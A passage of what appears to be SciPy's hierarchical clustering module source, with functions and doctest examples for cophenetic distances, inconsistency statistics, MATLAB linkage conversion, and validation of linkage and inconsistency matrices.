np.asarray(y)\n return xp.asarray(_optimal_leaf_ordering.optimal_leaf_ordering(Z, y))\n\n\ndef cophenet(Z, Y=None):\n \"\"\"\n Calculate the cophenetic distances between each observation in\n the hierarchical clustering defined by the linkage ``Z``.\n\n Suppose ``p`` and ``q`` are original observations in\n disjoint clusters ``s`` and ``t``, respectively, and\n ``s`` and ``t`` are joined by a direct parent cluster\n ``u``. The cophenetic distance between observations\n ``p`` and ``q`` is simply the distance between\n clusters ``s`` and ``t``.\n\n Parameters\n ----------\n Z : ndarray\n The hierarchical clustering encoded as an array\n (see `linkage` function).\n Y : ndarray (optional)\n Calculates the cophenetic correlation coefficient ``c`` of a\n hierarchical clustering defined by the linkage matrix `Z`\n of a set of :math:`n` observations in :math:`m`\n dimensions. `Y` is the condensed distance matrix from which\n `Z` was generated.\n\n Returns\n -------\n c : ndarray\n The cophenetic correlation distance (if ``Y`` is passed).\n d : ndarray\n The cophenetic distance matrix in condensed form. The\n :math:`ij` th entry is the cophenetic distance between\n original observations :math:`i` and :math:`j`.\n\n See Also\n --------\n linkage :\n for a description of what a linkage matrix is.\n scipy.spatial.distance.squareform :\n transforming condensed matrices into square ones.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import single, cophenet\n >>> from scipy.spatial.distance import pdist, squareform\n\n Given a dataset ``X`` and a linkage matrix ``Z``, the cophenetic distance\n between two points of ``X`` is the distance between the largest two\n distinct clusters that each of the points belongs to:\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... 
[4, 4], [3, 4], [4, 3]]\n\n ``X`` corresponds to this dataset ::\n\n x x x x\n x x\n\n x x\n x x x x\n\n >>> Z = single(pdist(X))\n >>> Z\n array([[ 0., 1., 1., 2.],\n [ 2., 12., 1., 3.],\n [ 3., 4., 1., 2.],\n [ 5., 14., 1., 3.],\n [ 6., 7., 1., 2.],\n [ 8., 16., 1., 3.],\n [ 9., 10., 1., 2.],\n [11., 18., 1., 3.],\n [13., 15., 2., 6.],\n [17., 20., 2., 9.],\n [19., 21., 2., 12.]])\n >>> cophenet(Z)\n array([1., 1., 2., 2., 2., 2., 2., 2., 2., 2., 2., 1., 2., 2., 2., 2., 2.,\n 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 1., 1., 2., 2.,\n 2., 2., 2., 2., 1., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2.,\n 1., 1., 2., 2., 2., 1., 2., 2., 2., 2., 2., 2., 1., 1., 1.])\n\n The output of the `scipy.cluster.hierarchy.cophenet` method is\n represented in condensed form. We can use\n `scipy.spatial.distance.squareform` to see the output as a\n regular matrix (where each element ``ij`` denotes the cophenetic distance\n between each ``i``, ``j`` pair of points in ``X``):\n\n >>> squareform(cophenet(Z))\n array([[0., 1., 1., 2., 2., 2., 2., 2., 2., 2., 2., 2.],\n [1., 0., 1., 2., 2., 2., 2., 2., 2., 2., 2., 2.],\n [1., 1., 0., 2., 2., 2., 2., 2., 2., 2., 2., 2.],\n [2., 2., 2., 0., 1., 1., 2., 2., 2., 2., 2., 2.],\n [2., 2., 2., 1., 0., 1., 2., 2., 2., 2., 2., 2.],\n [2., 2., 2., 1., 1., 0., 2., 2., 2., 2., 2., 2.],\n [2., 2., 2., 2., 2., 2., 0., 1., 1., 2., 2., 2.],\n [2., 2., 2., 2., 2., 2., 1., 0., 1., 2., 2., 2.],\n [2., 2., 2., 2., 2., 2., 1., 1., 0., 2., 2., 2.],\n [2., 2., 2., 2., 2., 2., 2., 2., 2., 0., 1., 1.],\n [2., 2., 2., 2., 2., 2., 2., 2., 2., 1., 0., 1.],\n [2., 2., 2., 2., 2., 2., 2., 2., 2., 1., 1., 0.]])\n\n In this example, the cophenetic distance between points of ``X`` that are\n very close (i.e., in the same corner) is 1. For other pairs of points, it\n is 2, because the points will be located in clusters at different\n corners - thus, the distance between these clusters will be larger.\n\n \"\"\"\n xp = array_namespace(Z, Y)\n # Ensure float64 C-contiguous array. Cython code doesn't deal with striding.\n Z = as_xparray(Z, order='C', dtype=xp.float64, xp=xp)\n is_valid_linkage(Z, throw=True, name='Z')\n n = Z.shape[0] + 1\n zz = np.zeros((n * (n-1)) // 2, dtype=np.float64)\n\n Z = np.asarray(Z)\n _hierarchy.cophenetic_distances(Z, zz, int(n))\n zz = xp.asarray(zz)\n if Y is None:\n return zz\n\n Y = as_xparray(Y, order='C', xp=xp)\n distance.is_valid_y(Y, throw=True, name='Y')\n\n z = xp.mean(zz)\n y = xp.mean(Y)\n Yy = Y - y\n Zz = zz - z\n numerator = (Yy * Zz)\n denomA = Yy**2\n denomB = Zz**2\n c = xp.sum(numerator) / xp.sqrt(xp.sum(denomA) * xp.sum(denomB))\n return (c, zz)\n\n\ndef inconsistent(Z, d=2):\n r\"\"\"\n Calculate inconsistency statistics on a linkage matrix.\n\n Parameters\n ----------\n Z : ndarray\n The :math:`(n-1)` by 4 matrix encoding the linkage (hierarchical\n clustering). See `linkage` documentation for more information on its\n form.\n d : int, optional\n The number of links up to `d` levels below each non-singleton cluster.\n\n Returns\n -------\n R : ndarray\n A :math:`(n-1)` by 4 matrix where the ``i``'th row contains the link\n statistics for the non-singleton cluster ``i``. The link statistics are\n computed over the link heights for links :math:`d` levels below the\n cluster ``i``. ``R[i,0]`` and ``R[i,1]`` are the mean and standard\n deviation of the link heights, respectively; ``R[i,2]`` is the number\n of links included in the calculation; and ``R[i,3]`` is the\n inconsistency coefficient,\n\n .. 
math:: \\frac{\\mathtt{Z[i,2]} - \\mathtt{R[i,0]}} {R[i,1]}\n\n Notes\n -----\n This function behaves similarly to the MATLAB(TM) ``inconsistent``\n function.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import inconsistent, linkage\n >>> from matplotlib import pyplot as plt\n >>> X = [[i] for i in [2, 8, 0, 4, 1, 9, 9, 0]]\n >>> Z = linkage(X, 'ward')\n >>> print(Z)\n [[ 5. 6. 0. 2. ]\n [ 2. 7. 0. 2. ]\n [ 0. 4. 1. 2. ]\n [ 1. 8. 1.15470054 3. ]\n [ 9. 10. 2.12132034 4. ]\n [ 3. 12. 4.11096096 5. ]\n [11. 13. 14.07183949 8. ]]\n >>> inconsistent(Z)\n array([[ 0. , 0. , 1. , 0. ],\n [ 0. , 0. , 1. , 0. ],\n [ 1. , 0. , 1. , 0. ],\n [ 0.57735027, 0.81649658, 2. , 0.70710678],\n [ 1.04044011, 1.06123822, 3. , 1.01850858],\n [ 3.11614065, 1.40688837, 2. , 0.70710678],\n [ 6.44583366, 6.76770586, 3. , 1.12682288]])\n\n \"\"\"\n xp = array_namespace(Z)\n Z = as_xparray(Z, order='C', dtype=xp.float64, xp=xp)\n is_valid_linkage(Z, throw=True, name='Z')\n\n if (not d == np.floor(d)) or d < 0:\n raise ValueError('The second argument d must be a nonnegative '\n 'integer value.')\n\n n = Z.shape[0] + 1\n R = np.zeros((n - 1, 4), dtype=np.float64)\n\n Z = np.asarray(Z)\n _hierarchy.inconsistent(Z, R, int(n), int(d))\n R = xp.asarray(R)\n return R\n\n\ndef from_mlab_linkage(Z):\n \"\"\"\n Convert a linkage matrix generated by MATLAB(TM) to a new\n linkage matrix compatible with this module.\n\n The conversion does two things:\n\n * the indices are converted from ``1..N`` to ``0..(N-1)`` form,\n and\n\n * a fourth column ``Z[:,3]`` is added where ``Z[i,3]`` represents the\n number of original observations (leaves) in the non-singleton\n cluster ``i``.\n\n This function is useful when loading in linkages from legacy data\n files generated by MATLAB.\n\n Parameters\n ----------\n Z : ndarray\n A linkage matrix generated by MATLAB(TM).\n\n Returns\n -------\n ZS : ndarray\n A linkage matrix compatible with ``scipy.cluster.hierarchy``.\n\n See Also\n --------\n linkage : for a description of what a linkage matrix is.\n to_mlab_linkage : transform from SciPy to MATLAB format.\n\n Examples\n --------\n >>> import numpy as np\n >>> from scipy.cluster.hierarchy import ward, from_mlab_linkage\n\n Given a linkage matrix in MATLAB format ``mZ``, we can use\n `scipy.cluster.hierarchy.from_mlab_linkage` to import\n it into SciPy format:\n\n >>> mZ = np.array([[1, 2, 1], [4, 5, 1], [7, 8, 1],\n ... [10, 11, 1], [3, 13, 1.29099445],\n ... [6, 14, 1.29099445],\n ... [9, 15, 1.29099445],\n ... [12, 16, 1.29099445],\n ... [17, 18, 5.77350269],\n ... [19, 20, 5.77350269],\n ... [21, 22, 8.16496581]])\n\n >>> Z = from_mlab_linkage(mZ)\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 2. , 12. , 1.29099445, 3. ],\n [ 5. , 13. , 1.29099445, 3. ],\n [ 8. , 14. , 1.29099445, 3. ],\n [ 11. , 15. , 1.29099445, 3. ],\n [ 16. , 17. , 5.77350269, 6. ],\n [ 18. , 19. , 5.77350269, 6. ],\n [ 20. , 21. , 8.16496581, 12. ]])\n\n As expected, the linkage matrix ``Z`` returned includes an\n additional column counting the number of original samples in\n each cluster. 
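For instance, the counts column of the\n last row shows that the final merge joins all 12 original observations:\n\n >>> float(Z[-1, 3])\n 12.0\n\n 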
Also, all cluster indices are reduced by 1\n (MATLAB format uses 1-indexing, whereas SciPy uses 0-indexing).\n\n \"\"\"\n xp = array_namespace(Z)\n Z = as_xparray(Z, dtype=xp.float64, order='C', xp=xp)\n Zs = Z.shape\n\n # If it's empty, return it.\n if len(Zs) == 0 or (len(Zs) == 1 and Zs[0] == 0):\n return copy(Z, xp=xp)\n\n if len(Zs) != 2:\n raise ValueError("The linkage array must be rectangular.")\n\n # If it contains no rows, return it.\n if Zs[0] == 0:\n return copy(Z, xp=xp)\n\n Zpart = copy(Z, xp=xp)\n if xp.min(Zpart[:, 0:2]) != 1.0 and xp.max(Zpart[:, 0:2]) != 2 * Zs[0]:\n raise ValueError('The format of the indices is not 1..N')\n\n Zpart[:, 0:2] -= 1.0\n CS = np.zeros((Zs[0],), dtype=np.float64)\n Zpart = np.asarray(Zpart)\n _hierarchy.calculate_cluster_sizes(Zpart, CS, int(Zs[0]) + 1)\n res = np.hstack([Zpart, CS.reshape(Zs[0], 1)])\n return xp.asarray(res)\n\n\ndef to_mlab_linkage(Z):\n \"\"\"\n Convert a linkage matrix to a MATLAB(TM) compatible one.\n\n Converts a linkage matrix ``Z`` generated by the linkage function\n of this module to a MATLAB(TM) compatible one. The returned linkage\n matrix has the last column removed and the cluster indices are\n converted to ``1..N`` indexing.\n\n Parameters\n ----------\n Z : ndarray\n A linkage matrix generated by ``scipy.cluster.hierarchy``.\n\n Returns\n -------\n to_mlab_linkage : ndarray\n A linkage matrix compatible with MATLAB(TM)'s hierarchical\n clustering functions.\n\n The returned linkage matrix has the last column removed\n and the cluster indices are converted to ``1..N`` indexing.\n\n See Also\n --------\n linkage : for a description of what a linkage matrix is.\n from_mlab_linkage : transform from MATLAB to SciPy format.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import ward, to_mlab_linkage\n >>> from scipy.spatial.distance import pdist\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> Z = ward(pdist(X))\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 2. , 12. , 1.29099445, 3. ],\n [ 5. , 13. , 1.29099445, 3. ],\n [ 8. , 14. , 1.29099445, 3. ],\n [11. , 15. , 1.29099445, 3. ],\n [16. , 17. , 5.77350269, 6. ],\n [18. , 19. , 5.77350269, 6. ],\n [20. , 21. , 8.16496581, 12. ]])\n\n After a linkage matrix ``Z`` has been created, we can use\n `scipy.cluster.hierarchy.to_mlab_linkage` to convert it\n into MATLAB format:\n\n >>> mZ = to_mlab_linkage(Z)\n >>> mZ\n array([[ 1. , 2. , 1. ],\n [ 4. , 5. , 1. ],\n [ 7. , 8. , 1. ],\n [ 10. , 11. , 1. ],\n [ 3. , 13. , 1.29099445],\n [ 6. , 14. , 1.29099445],\n [ 9. , 15. , 1.29099445],\n [ 12. , 16. , 1.29099445],\n [ 17. , 18. , 5.77350269],\n [ 19. , 20. , 5.77350269],\n [ 21. , 22. , 8.16496581]])\n\n The new linkage matrix ``mZ`` uses 1-indexing for all the\n clusters (instead of 0-indexing). Also, the last column of\n the original linkage matrix has been dropped.
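\n\n Converting back with `from_mlab_linkage` should recover ``Z`` exactly,\n since the dropped counts column can be recomputed from the merge\n structure:\n\n >>> import numpy as np\n >>> from scipy.cluster.hierarchy import from_mlab_linkage\n >>> bool(np.allclose(from_mlab_linkage(mZ), Z))\n True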
\n\n \"\"\"\n xp = array_namespace(Z)\n Z = as_xparray(Z, order='C', dtype=xp.float64, xp=xp)\n Zs = Z.shape\n if len(Zs) == 0 or (len(Zs) == 1 and Zs[0] == 0):\n return copy(Z, xp=xp)\n is_valid_linkage(Z, throw=True, name='Z')\n\n ZP = copy(Z[:, 0:3], xp=xp)\n ZP[:, 0:2] += 1.0\n\n return ZP\n\n\ndef is_monotonic(Z):\n \"\"\"\n Return True if the linkage passed is monotonic.\n\n The linkage is monotonic if for every cluster :math:`s` and :math:`t`\n joined, the distance between them is no less than the distance\n between any previously joined clusters.\n\n Parameters\n ----------\n Z : ndarray\n The linkage matrix to check for monotonicity.\n\n Returns\n -------\n b : bool\n A boolean indicating whether the linkage is monotonic.\n\n See Also\n --------\n linkage : for a description of what a linkage matrix is.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import median, ward, is_monotonic\n >>> from scipy.spatial.distance import pdist\n\n By definition, some hierarchical clustering algorithms - such as\n `scipy.cluster.hierarchy.ward` - produce monotonic assignments of\n samples to clusters; however, this is not always true for other\n hierarchical methods - e.g. `scipy.cluster.hierarchy.median`.\n\n Given a linkage matrix ``Z`` (as the result of a hierarchical clustering\n method) we can test programmatically whether it has the monotonicity\n property or not, using `scipy.cluster.hierarchy.is_monotonic`:\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> Z = ward(pdist(X))\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 2. , 12. , 1.29099445, 3. ],\n [ 5. , 13. , 1.29099445, 3. ],\n [ 8. , 14. , 1.29099445, 3. ],\n [11. , 15. , 1.29099445, 3. ],\n [16. , 17. , 5.77350269, 6. ],\n [18. , 19. , 5.77350269, 6. ],\n [20. , 21. , 8.16496581, 12. ]])\n >>> is_monotonic(Z)\n True\n\n >>> Z = median(pdist(X))\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 2. , 12. , 1.11803399, 3. ],\n [ 5. , 13. , 1.11803399, 3. ],\n [ 8. , 15. , 1.11803399, 3. ],\n [11. , 14. , 1.11803399, 3. ],\n [18. , 19. , 3. , 6. ],\n [16. , 17. , 3.5 , 6. ],\n [20. , 21. , 3.25 , 12. ]])\n >>> is_monotonic(Z)\n False\n\n Note that this method is equivalent to just verifying that the distances\n in the third column of the linkage matrix appear in a monotonically\n increasing order.\n\n \"\"\"\n xp = array_namespace(Z)\n Z = as_xparray(Z, order='c', xp=xp)\n is_valid_linkage(Z, throw=True, name='Z')\n\n # We expect each value in Z[:, 2] to be no smaller than its predecessor.\n return xp.all(Z[1:, 2] >= Z[:-1, 2])\n\n\ndef is_valid_im(R, warning=False, throw=False, name=None):\n \"\"\"Return True if the inconsistency matrix passed is valid.\n\n It must be an :math:`n` by 4 array of doubles. The standard\n deviations ``R[:,1]`` must be nonnegative. 
The link counts\n ``R[:,2]`` must be positive and no greater than :math:`n-1`.\n\n Parameters\n ----------\n R : ndarray\n The inconsistency matrix to check for validity.\n warning : bool, optional\n When True, issues a Python warning if the inconsistency\n matrix passed is invalid.\n throw : bool, optional\n When True, throws a Python exception if the inconsistency\n matrix passed is invalid.\n name : str, optional\n This string refers to the variable name of the invalid\n inconsistency matrix.\n\n Returns\n -------\n b : bool\n True if the inconsistency matrix is valid.\n\n See Also\n --------\n linkage : for a description of what a linkage matrix is.\n inconsistent : for the creation of an inconsistency matrix.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import ward, inconsistent, is_valid_im\n >>> from scipy.spatial.distance import pdist\n\n Given a data set ``X``, we can apply a clustering method to obtain a\n linkage matrix ``Z``. `scipy.cluster.hierarchy.inconsistent` can\n also be used to obtain the inconsistency matrix ``R`` associated to\n this clustering process:\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> Z = ward(pdist(X))\n >>> R = inconsistent(Z)\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 2. , 12. , 1.29099445, 3. ],\n [ 5. , 13. , 1.29099445, 3. ],\n [ 8. , 14. , 1.29099445, 3. ],\n [11. , 15. , 1.29099445, 3. ],\n [16. , 17. , 5.77350269, 6. ],\n [18. , 19. , 5.77350269, 6. ],\n [20. , 21. , 8.16496581, 12. ]])\n >>> R\n array([[1. , 0. , 1. , 0. ],\n [1. , 0. , 1. , 0. ],\n [1. , 0. , 1. , 0. ],\n [1. , 0. , 1. , 0. ],\n [1.14549722, 0.20576415, 2. , 0.70710678],\n [1.14549722, 0.20576415, 2. , 0.70710678],\n [1.14549722, 0.20576415, 2. , 0.70710678],\n [1.14549722, 0.20576415, 2. , 0.70710678],\n [2.78516386, 2.58797734, 3. , 1.15470054],\n [2.78516386, 2.58797734, 3. , 1.15470054],\n [6.57065706, 1.38071187, 3. , 1.15470054]])\n\n Now we can use `scipy.cluster.hierarchy.is_valid_im` to verify that\n ``R`` is correct:\n\n >>> is_valid_im(R)\n True\n\n However, if ``R`` is wrongly constructed (e.g., one of the standard\n deviations is set to a negative value), then the check will fail:\n\n >>> R[-1,1] = R[-1,1] * -1\n >>> is_valid_im(R)\n False\n\n \"\"\"\n xp = array_namespace(R)\n R = as_xparray(R, order='c', xp=xp)\n valid = True\n name_str = "%r " % name if name else ''\n try:\n if R.dtype != xp.float64:\n raise TypeError('Inconsistency matrix %smust contain doubles '\n '(double).' % name_str)\n if len(R.shape) != 2:\n raise ValueError('Inconsistency matrix %smust have shape=2 (i.e. '\n 'be two-dimensional).' % name_str)\n if R.shape[1] != 4:\n raise ValueError('Inconsistency matrix %smust have 4 columns.' %\n name_str)\n if R.shape[0] < 1:\n raise ValueError('Inconsistency matrix %smust have at least one '\n 'row.' % name_str)\n if xp.any(R[:, 0] < 0):\n raise ValueError('Inconsistency matrix %scontains negative link '\n 'height means.' % name_str)\n if xp.any(R[:, 1] < 0):\n raise ValueError('Inconsistency matrix %scontains negative link '\n 'height standard deviations.' % name_str)\n if xp.any(R[:, 2] < 0):\n raise ValueError('Inconsistency matrix %scontains negative link '\n 'counts.' 
% name_str)\n except Exception as e:\n if throw:\n raise\n if warning:\n _warning(str(e))\n valid = False\n\n return valid\n\n\ndef is_valid_linkage(Z, warning=False, throw=False, name=None):\n \"\"\"\n Check the validity of a linkage matrix.\n\n A linkage matrix is valid if it is a 2-D array (type double)\n with :math:`n` rows and 4 columns. The first two columns must contain\n indices between 0 and :math:`2n-1`. For a given row ``i``, the following\n two expressions have to hold:\n\n .. math::\n\n 0 \\\leq \\\mathtt{Z[i,0]} \\\leq i+n-1\n 0 \\\leq \\\mathtt{Z[i,1]} \\\leq i+n-1\n\n I.e., a cluster cannot join another cluster unless the cluster being joined\n has been generated.\n\n Parameters\n ----------\n Z : array_like\n Linkage matrix.\n warning : bool, optional\n When True, issues a Python warning if the linkage\n matrix passed is invalid.\n throw : bool, optional\n When True, throws a Python exception if the linkage\n matrix passed is invalid.\n name : str, optional\n This string refers to the variable name of the invalid\n linkage matrix.\n\n Returns\n -------\n b : bool\n True if the linkage matrix is valid.\n\n See Also\n --------\n linkage: for a description of what a linkage matrix is.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import ward, is_valid_linkage\n >>> from scipy.spatial.distance import pdist\n\n All linkage matrices generated by the clustering methods in this module\n will be valid (i.e., they will have the appropriate dimensions and the two\n required expressions will hold for all the rows).\n\n We can check this using `scipy.cluster.hierarchy.is_valid_linkage`:\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> Z = ward(pdist(X))\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 2. , 12. , 1.29099445, 3. ],\n [ 5. , 13. , 1.29099445, 3. ],\n [ 8. , 14. , 1.29099445, 3. ],\n [11. , 15. , 1.29099445, 3. ],\n [16. , 17. , 5.77350269, 6. ],\n [18. , 19. , 5.77350269, 6. ],\n [20. , 21. , 8.16496581, 12. ]])\n >>> is_valid_linkage(Z)\n True\n\n However, if we create a linkage matrix in a wrong way - or if we modify\n a valid one in a way that any of the required expressions don't hold\n anymore, then the check will fail:\n\n >>> Z[3][1] = 20 # the cluster number 20 is not defined at this point\n >>> is_valid_linkage(Z)\n False\n\n \"\"\"\n xp = array_namespace(Z)\n Z = as_xparray(Z, order='c', xp=xp)\n valid = True\n name_str = "%r " % name if name else ''\n try:\n if Z.dtype != xp.float64:\n raise TypeError('Linkage matrix %smust contain doubles.' % name_str)\n if len(Z.shape) != 2:\n raise ValueError('Linkage matrix %smust have shape=2 (i.e. be '\n 'two-dimensional).' % name_str)\n if Z.shape[1] != 4:\n raise ValueError('Linkage matrix %smust have 4 columns.' % name_str)\n if Z.shape[0] == 0:\n raise ValueError('Linkage must be computed on at least two '\n 'observations.')\n n = Z.shape[0]\n if n > 1:\n if (xp.any(Z[:, 0] < 0) or xp.any(Z[:, 1] < 0)):\n raise ValueError('Linkage %scontains negative indices.' %\n name_str)\n if xp.any(Z[:, 2] < 0):\n raise ValueError('Linkage %scontains negative distances.' %\n name_str)\n if xp.any(Z[:, 3] < 0):\n raise ValueError('Linkage %scontains negative counts.' %\n name_str)\n if _check_hierarchy_uses_cluster_before_formed(Z):\n raise ValueError('Linkage %suses non-singleton cluster before '\n 'it is formed.' 
% name_str)\n if _check_hierarchy_uses_cluster_more_than_once(Z):\n raise ValueError('Linkage %suses the same cluster more than once.'\n % name_str)\n except Exception as e:\n if throw:\n raise\n if warning:\n _warning(str(e))\n valid = False\n\n return valid\n\n\ndef _check_hierarchy_uses_cluster_before_formed(Z):\n n = Z.shape[0] + 1\n for i in range(0, n - 1):\n if Z[i, 0] >= n + i or Z[i, 1] >= n + i:\n return True\n return False\n\n\ndef _check_hierarchy_uses_cluster_more_than_once(Z):\n n = Z.shape[0] + 1\n chosen = set()\n for i in range(0, n - 1):\n if (float(Z[i, 0]) in chosen) or (float(Z[i, 1]) in chosen) or Z[i, 0] == Z[i, 1]:\n return True\n chosen.add(float(Z[i, 0]))\n chosen.add(float(Z[i, 1]))\n return False\n\n\ndef _check_hierarchy_not_all_clusters_used(Z):\n n = Z.shape[0] + 1\n chosen = set()\n for i in range(0, n - 1):\n chosen.add(int(Z[i, 0]))\n chosen.add(int(Z[i, 1]))\n must_chosen = set(range(0, 2 * n - 2))\n return len(must_chosen.difference(chosen)) > 0\n\n\ndef num_obs_linkage(Z):\n \"\"\"\n Return the number of original observations of the linkage matrix passed.\n\n Parameters\n ----------\n Z : ndarray\n The linkage matrix on which to perform the operation.\n\n Returns\n -------\n n : int\n The number of original observations in the linkage.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import ward, num_obs_linkage\n >>> from scipy.spatial.distance import pdist\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> Z = ward(pdist(X))\n\n ``Z`` is a linkage matrix obtained after using the Ward clustering method\n with ``X``, a dataset with 12 data points.\n\n >>> num_obs_linkage(Z)\n 12\n\n \"\"\"\n Z = as_xparray(Z, order='c')\n is_valid_linkage(Z, throw=True, name='Z')\n return (Z.shape[0] + 1)\n\n\ndef correspond(Z, Y):\n \"\"\"\n Check for correspondence between linkage and condensed distance matrices.\n\n They must have the same number of original observations for\n the check to succeed.\n\n This function is useful as a sanity check in algorithms that make\n extensive use of linkage and distance matrices that must\n correspond to the same set of original observations.\n\n Parameters\n ----------\n Z : array_like\n The linkage matrix to check for correspondence.\n Y : array_like\n The condensed distance matrix to check for correspondence.\n\n Returns\n -------\n b : bool\n A boolean indicating whether the linkage matrix and distance\n matrix could possibly correspond to one another.\n\n See Also\n --------\n linkage : for a description of what a linkage matrix is.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import ward, correspond\n >>> from scipy.spatial.distance import pdist\n\n This method can be used to check if a given linkage matrix ``Z`` has been\n obtained from the application of a cluster method over a dataset ``X``:\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... 
[4, 4], [3, 4], [4, 3]]\n >>> X_condensed = pdist(X)\n >>> Z = ward(X_condensed)\n\n Here, we can compare ``Z`` and ``X`` (in condensed form):\n\n >>> correspond(Z, X_condensed)\n True\n\n \"\"\"\n is_valid_linkage(Z, throw=True)\n distance.is_valid_y(Y, throw=True)\n xp = array_namespace(Z, Y)\n Z = as_xparray(Z, order='c', xp=xp)\n Y = as_xparray(Y, order='c', xp=xp)\n return distance.num_obs_y(Y) == num_obs_linkage(Z)\n\n\ndef fcluster(Z, t, criterion='inconsistent', depth=2, R=None, monocrit=None):\n \"\"\"\n Form flat clusters from the hierarchical clustering defined by\n the given linkage matrix.\n\n Parameters\n ----------\n Z : ndarray\n The hierarchical clustering encoded with the matrix returned\n by the `linkage` function.\n t : scalar\n For criteria 'inconsistent', 'distance' or 'monocrit',\n this is the threshold to apply when forming flat clusters.\n For 'maxclust' or 'maxclust_monocrit' criteria,\n this would be the maximum number of clusters requested.\n criterion : str, optional\n The criterion to use in forming flat clusters. This can\n be any of the following values:\n\n ``inconsistent`` :\n If a cluster node and all its\n descendants have an inconsistent value less than or equal\n to `t`, then all its leaf descendants belong to the\n same flat cluster. When no non-singleton cluster meets\n this criterion, every node is assigned to its own\n cluster. (Default)\n\n ``distance`` :\n Forms flat clusters so that the original\n observations in each flat cluster have no greater a\n cophenetic distance than `t`.\n\n ``maxclust`` :\n Finds a minimum threshold ``r`` so that\n the cophenetic distance between any two original\n observations in the same flat cluster is no more than\n ``r`` and no more than `t` flat clusters are formed.\n\n ``monocrit`` :\n Forms a flat cluster from a cluster node ``c``\n with index ``i`` when ``monocrit[i] <= t``.\n\n For example, to threshold on the maximum mean distance\n as computed in the inconsistency matrix R with a\n threshold of 0.8 do::\n\n MR = maxRstat(Z, R, 3)\n fcluster(Z, t=0.8, criterion='monocrit', monocrit=MR)\n\n ``maxclust_monocrit`` :\n Forms a flat cluster from a\n non-singleton cluster node ``c`` when ``monocrit[i] <=\n r`` for all cluster indices ``i`` below and including\n ``c``. ``r`` is minimized such that no more than ``t``\n flat clusters are formed. monocrit must be\n monotonic. For example, to minimize the threshold t on\n maximum inconsistency values so that no more than 3 flat\n clusters are formed, do::\n\n MI = maxinconsts(Z, R)\n fcluster(Z, t=3, criterion='maxclust_monocrit', monocrit=MI)\n depth : int, optional\n The maximum depth to perform the inconsistency calculation.\n It has no meaning for the other criteria. Default is 2.\n R : ndarray, optional\n The inconsistency matrix to use for the ``'inconsistent'``\n criterion. This matrix is computed if not provided.\n monocrit : ndarray, optional\n An array of length n-1. ``monocrit[i]`` is the\n statistic upon which non-singleton i is thresholded. The\n monocrit vector must be monotonic, i.e., given a node c with\n index i, for all node indices j corresponding to nodes\n below c, ``monocrit[i] >= monocrit[j]``.\n\n Returns\n -------\n fcluster : ndarray\n An array of length ``n``. 
``T[i]`` is the flat cluster number to\n which original observation ``i`` belongs.\n\n See Also\n --------\n linkage : for information about how hierarchical clustering methods work.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import ward, fcluster\n >>> from scipy.spatial.distance import pdist\n\n All cluster linkage methods - e.g., `scipy.cluster.hierarchy.ward` -\n generate a linkage matrix ``Z`` as their output:\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> Z = ward(pdist(X))\n\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 2. , 12. , 1.29099445, 3. ],\n [ 5. , 13. , 1.29099445, 3. ],\n [ 8. , 14. , 1.29099445, 3. ],\n [11. , 15. , 1.29099445, 3. ],\n [16. , 17. , 5.77350269, 6. ],\n [18. , 19. , 5.77350269, 6. ],\n [20. , 21. , 8.16496581, 12. ]])\n\n This matrix represents a dendrogram, where the first and second elements\n are 